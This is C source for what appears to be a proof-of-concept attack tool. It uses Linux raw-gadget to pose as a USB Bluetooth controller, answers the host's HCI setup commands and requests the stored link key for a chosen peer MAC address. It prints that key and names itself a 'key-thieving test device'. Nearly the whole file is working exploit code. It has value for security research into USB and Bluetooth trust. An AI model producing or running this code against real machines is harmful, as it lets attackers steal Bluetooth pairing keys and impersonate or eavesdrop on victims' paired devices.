// compile with -pthread
// roughly based off https://github.com/xairy/raw-gadget/blob/master/examples/keyboard.c
// NOTE: this is playing fast-and-loose with endianness, it'll break on big-endian systems.

#include <pthread.h>
#include <err.h>
#include <signal.h>
#include <errno.h>
#include <stdbool.h>
#include <assert.h>
#include <alloca.h>
#include <stddef.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/usb/raw_gadget.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static int usb_fd;

struct usb_raw_control_event {
  struct usb_raw_event inner;
  struct usb_ctrlrequest ctrl;
};

static struct usb_device_descriptor usb_device = {
  .bLength = USB_DT_DEVICE_SIZE,
  .bDescriptorType = USB_DT_DEVICE,
  .bcdUSB = __constant_cpu_to_le16(0x0200), /* USB 2.0 */
  .bDeviceClass = __constant_cpu_to_le16(0xe0),
  .bDeviceSubClass = __constant_cpu_to_le16(0x01),
  .bDeviceProtocol = __constant_cpu_to_le16(0x01),
  .bMaxPacketSize0 = 64, /* maximum value the kernel lets us use */

  /*
   * Test PID from https://pid.codes/1209/000B/.
   * For testing only.
   */
  .idVendor = __constant_cpu_to_le16(0x1209),
  .idProduct = __constant_cpu_to_le16(0x000b),

  .iManufacturer = 1,
  .iProduct = 2,
  .iSerialNumber = 3,

  .bNumConfigurations = 1
};

struct usb_config_descriptor usb_config = {
  .bLength = USB_DT_CONFIG_SIZE,
  .bDescriptorType = USB_DT_CONFIG,
  .wTotalLength = 0, // fixed up later
  .bNumInterfaces = 1,
  .bConfigurationValue = 1,
  .iConfiguration = 4,
  .bmAttributes =
    USB_CONFIG_ATT_ONE |// must be set
    USB_CONFIG_ATT_SELFPOWER,
  .bMaxPower = 0 // no power draw from host
};
struct usb_interface_descriptor usb_interface = {
  .bLength = USB_DT_INTERFACE_SIZE,
  .bDescriptorType = USB_DT_INTERFACE,
  .bInterfaceNumber = 0,
  .bAlternateSetting = 0,
  .bNumEndpoints = 3,
  /*
  .bInterfaceClass = ,
  .bInterfaceSubClass = ,
  .bInterfaceProtocol = ,
  .iInterface = ,
  */
};
struct usb_endpoint_descriptor usb_endpoint_in = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_IN | 1,
  .bmAttributes = USB_ENDPOINT_XFER_BULK,
  .wMaxPacketSize = 512,
  //.bInterval = 1
};
struct usb_endpoint_descriptor usb_endpoint_out = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_OUT | 1,
  .bmAttributes = USB_ENDPOINT_XFER_BULK,
  .wMaxPacketSize = 512,
  //.bInterval = 1
};
struct usb_endpoint_descriptor usb_endpoint_intr = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_IN | 2,
  .bmAttributes = USB_ENDPOINT_XFER_INT,
  .wMaxPacketSize = 8,
  .bInterval = 1
};
unsigned short intr_handle, in_handle, out_handle;

void usb_reply(const void *data, size_t len, size_t req_length) {
  //printf("         REPLY: size %lu, req_length %lu\n", (unsigned long)len, (unsigned long)req_length);
  if (len > req_length)
    len = req_length;
  struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+len);
  io->ep = 0;
  io->flags = 0;
  io->length = len;
  memcpy(io->data, data, len);
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_WRITE, io));
}

void usb_get_and_ack(void *buf, size_t len, size_t req_length) {
  //printf("         ACK OUT: req_length %lu\n", (unsigned long)req_length);
  struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+req_length);
  memset(io, 0xee, sizeof(struct usb_raw_ep_io)+req_length);
  io->ep = 0;
  io->flags = 0;
  io->length = req_length;
  //printf("issuing USB_RAW_IOCTL_EP0_READ with io->length=%u\n", io->length);
  int ret_len = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_READ, io));
  assert(ret_len == req_length);
  if (buf) {
    if (len > req_length) {
      memset(buf, '\0', len);
      len = req_length;
    }
    memcpy(buf, ((char*)io)+sizeof(struct usb_raw_ep_io), len);
  }
}
void usb_ack(size_t req_length) {
  usb_get_and_ack(NULL, 0, req_length);
}

void descr_append(void *buf, size_t *buf_len, void *descr, size_t descr_len) {
  //printf("           descr_append(buf, len, descr, descr_len=%lu with first byte %hhu\n", (unsigned long)descr_len, *(unsigned char *)descr);
  assert(descr_len <= 255);
  assert(descr_len >= 2);
  assert(((unsigned char*)descr)[0] == descr_len);
  memcpy(buf + *buf_len, descr, descr_len);
  (*buf_len) += descr_len;
  ((struct usb_config_descriptor*)buf)->wTotalLength = __cpu_to_le16(*buf_len);
}

char hex_digit(unsigned char value) {
  if (value >= 10)
    return 'A' + (value - 10);
  else
    return '0' + value;
}

void send_bulk(void *data, size_t len) {
  static pthread_mutex_t bulk_mutex = PTHREAD_MUTEX_INITIALIZER;

  pthread_mutex_lock(&bulk_mutex);
  bool last;
  size_t off = 0;
  do {
    last = ((len-off) <= 512);
    size_t frag_len = last ? (len-off) : 512;
    struct {
      struct usb_raw_ep_io inner;
      char data[512];
    } io = {
      .inner = {
        .ep = in_handle,
        .flags = last ? USB_RAW_IO_FLAGS_ZERO : 0,
        .length = frag_len,
      },
    };
    memcpy(io.data, data+off, frag_len);
    SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_WRITE, &io));
    off += frag_len;
  } while (!last);
  pthread_mutex_unlock(&bulk_mutex);
}

void *bulk_out_thread_fn(void *arg) {
  while (1) {
    struct {
      struct usb_raw_ep_io inner;
      char data[4096];
    } io = {
      .inner = {
        .ep = out_handle,
        .flags = 0,
        .length = sizeof(io.data)
      }
    };
    int res = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_READ, &io));
    printf("bulk_out: got %d bytes\n", res);
  }
}

#define HCI_EV_CMD_COMPLETE 0x0e
struct hci_ev_cmd_complete {
  unsigned char ncmd;
  unsigned short opcode;
} __attribute__((packed));

void send_event(unsigned char evt, void *payload, unsigned char plen) {
  //printf("        send_event(0x%02hhx, payload, %u)\n", evt, plen);
  struct {
    struct usb_raw_ep_io io;
    struct {
      unsigned char evt;
      unsigned char plen;
      unsigned char payload[255];
    } data;
  } io_with_data = {
    .io = {
      .ep = intr_handle,
      .flags = 0,
      .length = 2+plen
    }, .data = {
      .evt = evt,
      .plen = plen
    }
  };
  memcpy(io_with_data.data.payload, payload, plen);
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_WRITE, &io_with_data));
}

int send_key_request = false;
void handle_alarm(int sig) {
  send_key_request = true;
}

void parse_mac(unsigned char *out, char *str) {
  if (strlen(str) != 3*6 - 1)
    errx(1, "bad MAC (wrong length): '%s'", str);
  for (int i=0; i<6; i++) {
    char *endp;
    if (i != 5 && str[3*i + 2] != ':')
      errx(1, "bad MAC (didn't see expected ':'");
    out[5-i] = strtol(str + 3*i, &endp, 16);
    if (endp != str + 3*i + 2)
      errx(1, "bad MAC (bogus hex number)");
  }
}

int main(int argc, char **argv) {
  if (argc != 5) {
    fprintf(stderr, "usage: %s <dummy_udc|net2280|...> <dummy_udc.0|PCI ADDRESS|...> <host BT MAC (XX:XX:XX:XX:XX:XX)> <peer BT MAC (XX:XX:XX:XX:XX:XX)>\n", argv[0]);
    return 1;
  }

  unsigned char host_mac[6];
  unsigned char peer_mac[6];
  parse_mac(host_mac, argv[3]);
  parse_mac(peer_mac, argv[4]);

  usb_fd = SYSCHK(open("/dev/raw-gadget", O_RDWR));

  signal(SIGALRM, handle_alarm);

  struct usb_raw_init init_args = {
    .speed = USB_SPEED_HIGH
  };
  strcpy((char*)init_args.driver_name, argv[1]);
  strcpy((char*)init_args.device_name, argv[2]);
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_INIT, &init_args));
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_RUN, 0));

  while (1) {
    if (send_key_request) {
      send_key_request = false;
      printf("===================== REQUESTING LINK KEY =====================\n");
      send_event(0x17/*LINK_KEY_REQ*/, peer_mac, sizeof(peer_mac));
    }

    struct usb_raw_control_event control_ev = {
      .inner = { .type = 0, .length = sizeof(control_ev.ctrl) }
    };
    if (ioctl(usb_fd, USB_RAW_IOCTL_EVENT_FETCH, &control_ev)) {
      if (errno == EINTR)
        continue;
      err(1, "USB_RAW_IOCTL_EVENT_FETCH");
    }
    if (control_ev.inner.type == USB_RAW_EVENT_CONNECT) {
      printf("got connect\n");
      /*
      struct usb_raw_eps_info eps_info;
      int eps_count = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EPS_INFO, &eps_info));
      printf("  device controller's available non-control endpoints:\n");
      for (int i=0; i<eps_count; i++) {
        struct usb_raw_ep_info *ep = &eps_info.eps[i];
        printf("    ep[%d]: name='%s' addr=%u iso=%d bulk=%d int=%d in=%d out=%d maxpacket_limit=%u max_streams=%u\n",
               i, ep->name, ep->addr,
               ep->caps.type_iso, ep->caps.type_bulk, ep->caps.type_int, ep->caps.dir_in, ep->caps.dir_out,
               ep->limits.maxpacket_limit, ep->limits.max_streams);
      }
      */
    } else if (control_ev.inner.type == USB_RAW_EVENT_CONTROL) {
      unsigned req_length = __le16_to_cpu(control_ev.ctrl.wLength);
      bool is_dir_in = (control_ev.ctrl.bRequestType & USB_DIR_IN) != 0;
      printf("USB: got control (in=%d, wLength=%u):\n", is_dir_in, req_length);
      switch (control_ev.ctrl.bRequestType & USB_TYPE_MASK) {
        case USB_TYPE_STANDARD:
          switch(control_ev.ctrl.bRequest) {
            case USB_REQ_GET_DESCRIPTOR: {
              unsigned descriptor_type = control_ev.ctrl.wValue >> 8;
              switch (descriptor_type) {
                case USB_DT_DEVICE:
                  printf("  getting device descriptor\n");
                  usb_reply(&usb_device, sizeof(usb_device), req_length);
                  break;
                case USB_DT_CONFIG: {
                  printf("  getting dt config\n");
                  char dt_config[1024*128];
                  size_t dt_config_len = 0;
                  descr_append(dt_config, &dt_config_len, &usb_config, sizeof(usb_config));
                  descr_append(dt_config, &dt_config_len, &usb_interface, sizeof(usb_interface));
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_in, USB_DT_ENDPOINT_SIZE);
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_out, USB_DT_ENDPOINT_SIZE);
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_intr, USB_DT_ENDPOINT_SIZE);
                  usb_reply(dt_config, dt_config_len, req_length);
                } break;
                case USB_DT_STRING: {
                  unsigned string_id = control_ev.ctrl.wValue & 0xff;
                  printf("  getting string %d\n", string_id);
                  if (string_id == 0) {
                    unsigned char string_descr[] = {
                      4/*length*/, USB_DT_STRING,
                      0x09, 0x04 /* English - United States */
                    };
                    usb_reply(string_descr, sizeof(string_descr), req_length);
                  } else {
                    unsigned char string_descr[] = {
                      12/*length*/, USB_DT_STRING,
                      'D',0,'U',0,'M',0,'M',0,'Y',0
                    };
                    usb_reply(string_descr, sizeof(string_descr), req_length);
                  }
                } break;
                default:
                  errx(1, "USB_REQ_GET_DESCRIPTOR: descriptor_type=%x", descriptor_type);
              }
            } break;
            case USB_REQ_SET_CONFIGURATION: {
              static bool have_set_configuration = false;
              printf("  set configuration\n");
              in_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_in));
              out_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_out));
              intr_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_intr));
              SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_CONFIGURE, 0));
              usb_ack(req_length);
              if (!have_set_configuration) {
                pthread_t bulk_out_thread;
                pthread_create(&bulk_out_thread, NULL, bulk_out_thread_fn, NULL);
                alarm(1);
              }
            } break;
            case USB_REQ_SET_INTERFACE: {
              printf("  set interface\n");
              usb_ack(req_length);
            } break;
            default:
              errx(1, "unknown standard ctrlrequest 0x%x", (unsigned)control_ev.ctrl.bRequest);
          }
          break;
        case USB_TYPE_CLASS:;
          // from btusb_send_frame() with HCI_COMMAND_PKT
          struct {
            unsigned short opcode;
            unsigned char plen;
            unsigned char buf[255];
          } __attribute__((packed)) cmd;
          usb_get_and_ack(&cmd, sizeof(cmd), req_length);
          printf("got HCI_COMMAND_PKT, length=%d, opcode=0x%04x, plen=%d  ", (int)req_length, cmd.opcode, cmd.plen);
          switch (cmd.opcode) {
            case 0x0c03: {
              printf("  op=RESET\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x0c24: {
              printf("  op=WRITE_CLASS_OF_DEV\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x0c05: {
              printf("  op=SET_EVENT_FLT\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x0c13: {
              printf("  op=WRITE_LOCAL_NAME\n");
              cmd.buf[255] = '\0';
              printf("  new local name: '%s'\n", cmd.buf);
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x040b: {
              printf("  op=LINK_KEY_REPLY\n");
              struct {
                unsigned char bdaddr[6];
                unsigned char link_key[16];
              } *reply = (void*)cmd.buf;
              char bdaddr_str[6*3];
              for (int i=0; i<6; i++) {
                bdaddr_str[3*i+0] = hex_digit(reply->bdaddr[5-i] >> 4 );
                bdaddr_str[3*i+1] = hex_digit(reply->bdaddr[5-i] & 0xf);
                bdaddr_str[3*i+2] = (i == 5) ? '\0' : ':';
              }
              char link_key_str[2*16+1];
              for (int i=0; i<16; i++) {
                link_key_str[2*i+0] = hex_digit(reply->link_key[i] >> 4 );
                link_key_str[2*i+1] = hex_digit(reply->link_key[i] & 0xf);
              }
              link_key_str[2*16] = '\0';
              printf("<<<<<<<<<<< LINK KEY FOR %s: %s >>>>>>>>>>>\n", bdaddr_str, link_key_str);
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
              } __attribute__((packed)) ack = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &ack, sizeof(ack));
              exit(0);
            } break;
            case 0x040c: {
              printf("  op=LINK_KEY_NEG_REPLY\n");
              char bdaddr_str[6*3];
              for (int i=0; i<6; i++) {
                bdaddr_str[3*i+0] = hex_digit(cmd.buf[5-i] >> 4 );
                bdaddr_str[3*i+1] = hex_digit(cmd.buf[5-i] & 0xf);
                bdaddr_str[3*i+2] = (i == 5) ? '\0' : ':';
              }
              printf("<<<<<<<<<<< NO LINK KEY AVAILABLE FOR %s >>>>>>>>>>>\n", bdaddr_str);
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
              alarm(1);
            } break;
            case 0x0c1a: {
              printf("  op=WRITE_SCAN_ENABLE\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x1001: {
              printf("  op=READ_LOCAL_VERSION\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
                unsigned char hci_ver;
                unsigned short hci_rev;
                unsigned char lmp_ver;
                unsigned short manufacturer;
                unsigned short lmp_subver;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0,
                .hci_ver = 1, // bluetooth 1.1
                .hci_rev = 0,
                .lmp_ver = 0,
                .manufacturer = 0xf00d,
                .lmp_subver = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x1003: {
              printf("  op=HCI_OP_READ_LOCAL_FEATURES\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
                unsigned char features[8];
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0,
                /* see "LMP capabilities" in include/net/bluetooth/hci_core.h */
                .features = {
                  // TODO
                }
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x1005: {
              printf("  op=READ_BUFFER_SIZE\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
                unsigned short acl_mtu;
                unsigned char sco_mtu;
                unsigned short acl_max_pkt;
                unsigned short sco_max_pkt;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0,
                /* idk what any of this means, just guessing */
                .acl_mtu = 64,
                .sco_mtu = 64,
                .acl_max_pkt = 8,
                .sco_max_pkt = 8
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x0c14: {
              printf("  op=READ_LOCAL_NAME\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
                char name[248];
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0,
                .name = "key-thieving test device"
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x0c23: {
              printf("  op=READ_CLASS_OF_DEV\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
                unsigned char dev_class[3];
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0,
                .dev_class = {0,0,0}
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x0c25: {
              printf("  op=READ_VOICE_SETTING\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
                unsigned short voice_setting;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0,
                .voice_setting = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x0c38: {
              printf("  op=READ_NUM_SUPPORTED_IAC\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
                unsigned char num_iac;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0,
                .num_iac = 1
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x0c39: {
              printf("  op=READ_CURRENT_IAC_LAP\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
                unsigned char iac_lap[3];
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0,
                .iac_lap = { 0x12, 0x34, 0x56 }
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            case 0x0c16: {
              printf("  op=WRITE_CA_TIMEOUT\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0
              };
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;

            case 0x1009: {
              printf("  op=READ_BD_ADDR\n");
              struct {
                struct hci_ev_cmd_complete complete;
                unsigned char status;
                unsigned char bdaddr[6];
              } __attribute__((packed)) reply = {
                .complete = { .ncmd = 1, .opcode = cmd.opcode},
                .status = 0
              };
              memcpy(reply.bdaddr, host_mac, 6);
              send_event(HCI_EV_CMD_COMPLETE, &reply, sizeof(reply));
            } break;
            default:
              printf("!!!!!!!!!!!!!!!!     IGNORING UNKNOWN OPCODE\n");
              break;
          }
          break;
        case USB_TYPE_VENDOR:
          switch (control_ev.ctrl.bRequest) {
            default:
              errx(1, "unknown vendor ctrlrequest 0x%02hhx", control_ev.ctrl.bRequest);
          }
          break;
        default:
          errx(1, "USB_TYPE_* unknown");
      }
    } else {
      errx(1, "unknown event, type 0x%x\n", (unsigned)control_ev.inner.type);
    }
  }
}
